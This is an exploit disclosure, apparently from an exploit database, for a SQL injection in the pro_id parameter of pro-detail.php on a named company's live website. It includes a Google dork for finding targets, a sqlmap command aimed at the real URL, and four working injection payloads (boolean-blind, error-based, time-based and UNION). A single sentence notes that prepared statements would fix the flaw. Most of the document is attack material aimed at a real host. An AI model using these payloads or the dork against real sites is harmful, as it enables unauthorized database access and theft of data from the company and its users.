*********************************************************
#Exploit Title: Futronic Technology Company Limited. - SQL Injection Vulnerability
#Date: 2022-02-26
#Exploit Author: Jayson San Buenaventura
#Google Dork: "Futronic Technology Company Limited."
#Category: webapps
#Tested On: Kali Linux, CyberFox
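Proof of Concept:
The sqlmap output below reports the pro_id GET parameter of pro-detail.php as injectable through four techniques against a MySQL back end, which indicates the value reaches the query without being bound as a parameter; binding pro_id in a prepared statement and rejecting non-integer values would address all four.
Search Google using the dork: "Futronic Technology Company Limited."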
### Demo :
sqlmap -u 'https://www.futronic-tech.com/pro-detail.php?pro_id=1543' --dbs --random-agent
Parameter: pro_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pro_id=1543 AND 5828=5828
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: pro_id=1543 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707871,(SELECT (ELT(6573=6573,1))),0x716b6b7671,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pro_id=1543 AND (SELECT 8647 FROM (SELECT(SLEEP(5)))tjaj)
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: pro_id=1543 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707871,0x6164696478734969614d77504a4e4f726a4d4c4c4e50746a50746c514d6f456758546844766f644a,0x716b6b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
*********************************************************
#Discovered by: Jayson San Buenaventura
#Facebook: Jayson Cabrillas San Buenaventura
#Email: sanbuenaventurajayson27@gmail.com
*********************************************************